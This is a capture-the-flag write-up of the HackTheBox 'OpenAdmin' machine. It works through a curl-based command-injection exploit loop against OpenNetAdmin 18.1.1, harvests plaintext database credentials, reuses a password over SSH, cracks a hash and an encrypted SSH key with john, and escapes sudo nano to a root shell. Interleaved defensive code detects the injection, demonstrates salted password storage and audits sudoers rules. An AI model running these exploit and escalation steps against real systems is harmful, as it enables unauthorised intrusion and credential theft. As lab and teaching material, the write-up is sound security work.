HackTheBox OpenAdmin Writeup

OpenAdmin is a nice and easy box with basic exploitation techniques and a moderate privilege escalation section.

Published on May 20, 2020


Let’s start off with a basic port enum using nmap, just so we know which services are available.

nmap -A openadmin.htb

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Upon accessing port 80 we are granted with a default Apache2 page.

Default Apache2 page.

Surely there must be something else so let’s try and find it.

gobuster dir -u http://openadmin.htb -w /usr/share/wordlists/common.txt


All of the paths above lead to random HTML template pages for different websites that didn't contain anything useful; well, aside from /music, which did contain a link pointing to /ona.

Upon accessing the newly discovered path we find ourselves with an OpenNetAdmin application.

After a quick read of the index page we find the app version and determine it’s an outdated version (which is likely prone to vulnerabilities).

You are NOT on the latest release version.
Your version = v18.1.1


Searching on Google for “OpenNetAdmin 18.1.1” exploits leads us to this page. The exploit itself is nothing more than a curl request.


while true; do
 echo -n "www-data@openadmin:~$ "; read cmd
 curl -sd "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "http://openadmin.htb/ona/" | sed -n -e "/BEGIN/,/END/ p" | tail -n2 | head -n1
done
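From the defender's side, the request body this script sends has a recognisable shape: a window_submit xajax call whose ip=> argument carries shell metacharacters instead of an address. The check below is an added example written for this writeup, not code from the post or from OpenNetAdmin; it parses constructed sample POST bodies (made up here, not captured traffic) the way a WAF rule or a request-body log parser would, and flags the ones that smuggle shell syntax into the ping tooltip. The address 192.0.2.10 is a documentation-range placeholder.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Characters that have no place inside the "ip=>" argument of the ping tooltip;
# any of them means the value is being used to carry shell syntax.
SHELL_META = re.compile(r"[;|&`$<>\n]")

# Constructed sample POST bodies (not captured traffic). The second one mirrors the
# shape of the request the writeup's script sends, with a harmless command.
SAMPLE_BODIES = [
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E192.0.2.10&xajaxargs[]=ping",
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E;echo%20%22BEGIN%22;id;echo%20%22END%22&xajaxargs[]=ping",
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=id%3D%3E42&xajaxargs[]=host_info",
]


def parse_form(body):
    """Split an application/x-www-form-urlencoded body on '&' only. Parsers that also
    split on ';' would cut the injected command off and hide it from the check."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def classify_body(body):
    """Return 'not-a-ping', 'benign' or 'suspicious' for one request body."""
    params = parse_form(body)
    args = params.get("xajaxargs[]", [])
    if params.get("xajax") != ["window_submit"] or "ping" not in args:
        return "not-a-ping"
    target = next((a[len("ip=>"):] for a in args if a.startswith("ip=>")), "")
    if SHELL_META.search(target):
        return "suspicious"
    try:
        ipaddress.ip_address(target)   # the tooltip is meant to receive a bare address
    except ValueError:
        return "suspicious"            # anything else is a probe or an injection attempt
    return "benign"


def scan(bodies):
    """Classify every body and return the indexes that deserve an alert."""
    return [i for i, b in enumerate(bodies) if classify_body(b) == "suspicious"]


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify_body(body), body[:60])
```

The same classifier can be pointed at ModSecurity audit-log request bodies or at an inline rule; the useful part is refusing anything that is not a literal address rather than trying to enumerate bad characters.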

After executing the script we can do some internal poking around. A basic enum leads us to the database settings, which include plain text credentials.

// /opt/ona/www/local/config/database_settings.inc.php

  "DEFAULT" => array("databases" => array(0 =>
        "db_type" => "mysqli",
        "db_host" => "localhost",
        "db_login" => "ona_sys",
        "db_passwd" => "n1nj4W4rri0R!",
        "db_database" => "ona_default",
        "db_debug" => false,
    "description" => "Default data context",
    "context_color" => "#D3DBFF",

The parsed credentials are ona_sys / n1nj4W4rri0R!


Next, checking /etc/passwd reveals a user named jimmy, maybe he uses the same password for everything…


Since the ssh service is running we could try to login as jimmy, so let’s give it a shot.

ssh jimmy@openadmin.htb

Using the credentials found previously worked and we are now ssh’d in.


A quick enum displays our current groups.

jimmy internal

Under /var/www we can find a folder with the internal group permission, time to enum more.

drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www

After inspecting each and every file within that folder we find something juicy.

// /var/www/internal/index.php

// Note: an unsalted SHA-512 of the password, compared with PHP's loose == rather than hash_equals().
if ($_POST["username"] == "jimmy" && hash("sha512", $_POST["password"]) == "00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1") {
    $_SESSION["username"] = "jimmy";
    header("Location: /main.php");
}

The snippet above says that if we do a POST request with the proper credentials we are in (obviously). After looking up the sha512 hash on this online hash cracking website we find the user’s password.
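The reason that hash fell to a lookup site is visible in the snippet: it is a plain, unsalted SHA-512 of the password, so the same password yields the same digest on every site that stores it this way, and the digest is then compared with PHP's loose == instead of hash_equals(). The code below is an added example, not part of the writeup and not from the box; it uses a constructed sample password and a constructed stand-in for a public lookup table to show the unsalted digest resolving in one dictionary hit, then stores the same password with a per-user salt and PBKDF2-HMAC-SHA512 and verifies it in constant time.

```python
import hashlib
import hmac
import os

# Constructed sample password for the demonstration; not a credential from the box.
SAMPLE_PASSWORD = "correct horse battery staple"

# Constructed stand-in for a public hash-lookup table: a handful of common
# strings keyed by their unsalted SHA-512, which is how an online cracker
# resolves a digest like the one in index.php in a single query.
COMMON_STRINGS = ["password", "123456", "letmein", SAMPLE_PASSWORD]


def legacy_hash(password):
    """Unsalted SHA-512 as index.php computes it: one input, one digest, everywhere."""
    return hashlib.sha512(password.encode()).hexdigest()


LOOKUP_TABLE = {legacy_hash(s): s for s in COMMON_STRINGS}


def lookup_unsalted(digest):
    """Recover a password from an unsalted digest with a single dictionary lookup."""
    return LOOKUP_TABLE.get(digest)


def make_record(password, iterations=210_000):
    """Store a password as PBKDF2-HMAC-SHA512 with a fresh 16-byte salt.
    210,000 iterations is the figure OWASP's password storage guidance gives
    for PBKDF2-HMAC-SHA512; the record carries the count so it can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return f"pbkdf2_sha512${iterations}${salt.hex()}${dk.hex()}"


def verify(password, record):
    """Recompute the derivation and compare in constant time (no early-exit '==')."""
    try:
        algo, iterations, salt_hex, dk_hex = record.split("$")
    except ValueError:
        return False                      # malformed record, never a match
    if algo != "pbkdf2_sha512":
        return False
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("unsalted lookup:", lookup_unsalted(legacy_hash(SAMPLE_PASSWORD)))
    rec = make_record(SAMPLE_PASSWORD)
    print("salted record:  ", rec[:40], "...")
    print("verify ok:", verify(SAMPLE_PASSWORD, rec), "wrong:", verify("hunter2", rec))
```

Two records for the same password never match each other because each carries its own salt, so a leaked table of digests cannot be precomputed against them; in PHP the equivalent is password_hash() / password_verify(), which also handles the constant-time comparison.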


The next step is to figure out where this supposed internal page is running. The following command will print out all the ports that are listening for connections.

ss -lt


In order to connect to that port we are going to use ssh to create a tunnel for us (since it’s only available internally), forwarding the high port on remote to our local machine.

ssh -L 52846: jimmy@

Now we can access it by navigating to http://localhost:52846.

After logging in using the credentials that we just cracked we can grab joanna’s private key, but there’s a catch, it’s encrypted… Fear not, we can always crack the password.

Save the key as id_rsa in your current working directory.

ssh2john id_rsa > hash.txt

Cracking the generated hash is as simple as:

john -w:/usr/share/wordlists/rockyou.txt hash.txt


Great, now that we have the key and password we can ssh in as joanna.

ssh joanna@openadmin.htb -i id_rsa

cat ~/user.txt


Privilege Escalation

Time to get root! The first command I always run is sudo -l.

Oh, nice… looks like we can run something as sudo.

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Since nano is a common binary we can check GTFOBins; according to that page we can get a shell as root using:

sudo /bin/nano /opt/priv
reset; sh 1>&0 2>&0
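The sudoers rule itself is the root cause here: an interactive editor run as root is a shell in waiting, whatever file path it is restricted to. The script below is an added example (not from the writeup, the box or GTFOBins) that parses constructed sudoers-style lines, one of them modelled on the rule found above, and reports any rule whose binary is an editor, pager or interpreter, so the same misconfiguration can be caught in a config review before anyone runs sudo -l. The SHELL_CAPABLE set is a starter list I chose, not an exhaustive one.

```python
import os
import re

# Constructed sudoers content (not the box's real file). The joanna line is the
# rule the writeup found with sudo -l; the other lines are filler for contrast.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) NOPASSWD: /usr/bin/df -h
deploy  ALL=(ALL) /usr/bin/systemctl restart app, /usr/bin/systemctl status app
"""

# Binaries that can drop to a shell or read and write arbitrary files once they
# run privileged. Starter list only; GTFOBins is the reference to extend it from.
SHELL_CAPABLE = {
    "nano", "vi", "vim", "less", "more", "man",
    "python", "python3", "perl", "awk", "find", "bash", "sh",
}

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Turn user-spec lines into one dict per command (Defaults and comments skipped)."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z]+", m["tags"]))
        for cmd in m["cmds"].split(","):
            rules.append({
                "who": m["who"], "runas": m["runas"],
                "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip(),
            })
    return rules


def audit(rules):
    """Return (user, binary, nopasswd) for every rule that grants a shell-capable program."""
    findings = []
    for r in rules:
        if r["cmd"] == "ALL":
            continue  # unrestricted sudo is a policy question, not a shell-escape finding
        binary = os.path.basename(r["cmd"].split()[0])
        if binary in SHELL_CAPABLE:
            findings.append((r["who"], binary, r["nopasswd"]))
    return findings


if __name__ == "__main__":
    for who, binary, nopasswd in audit(parse_rules(SAMPLE_SUDOERS)):
        print(f"{who}: {binary} via sudo{' without a password' if nopasswd else ''}")
```

Run against a real /etc/sudoers and /etc/sudoers.d/* (or the output of sudo -l for each account) the check turns the manual GTFOBins lookup into a repeatable review step; the fix for a rule like joanna's is to grant a purpose-built, non-interactive command (or sudoedit for the one file) rather than an editor.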

Great, it worked!

cat ~/root.txt


And that’s it, thanks for reading!


Marlos Pomin
Full Stack Developer & Retoucher based in Brazil, also a casual pentester.